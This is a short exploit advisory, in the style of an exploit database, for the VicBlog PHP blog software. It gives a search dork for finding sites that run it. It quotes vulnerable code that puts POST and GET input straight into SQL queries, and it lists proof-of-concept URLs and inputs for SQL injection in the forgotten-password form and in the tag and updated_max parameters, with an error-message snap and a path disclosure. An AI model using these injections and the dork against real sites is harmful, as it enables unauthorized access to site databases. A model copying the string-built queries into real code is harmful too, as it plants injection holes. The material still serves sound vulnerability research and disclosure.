# Author : Geek
# Title : Vicblog Multiple Vulnerabilities
# Date : 10/25/2012
# Dork : allintext: "Powered by VicBlog"
# Tested On : Winxp


# Multiple Sql Injection 

    {x} File : password_forgotten
    
    {x} Code :
    
    
    $email = $_POST['email'] ; 
  
    $sql = mysql_query("SELECT * FROM vb_accounts where email = '$email'") 
    
    {x} P0c : 
    
    domain.tld/index.php?admin=password_forgotten
    
    In Forgotten Password? field put (x')
    Snap : 
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x''' at line 1

    {x} File : Posts.php

    {x} Code : 
    
    $tag            = isset($_GET['tag']) ? prepare_input($_GET['tag']) : "";
    $updated_max = isset($_GET['updated_max']) ? prepare_input($_GET['updated_max']) : "";
    
    Don't use reverse and post id paramater , cz it check if (int) or not
    
    {x} P0c : 
    
    domain.tld/index.php?page=posts${tag or upated_max paramater}=1[SQL]
    
# Path Disclosure

    {x} File : /admin/index.php
    
    {x} Code : 
    
    <?php
    header("location:../index.php");
    exit();
    ?>
    
    {x} P0c :
    
    domain.tld/index.php?admin=index
    
# End Of File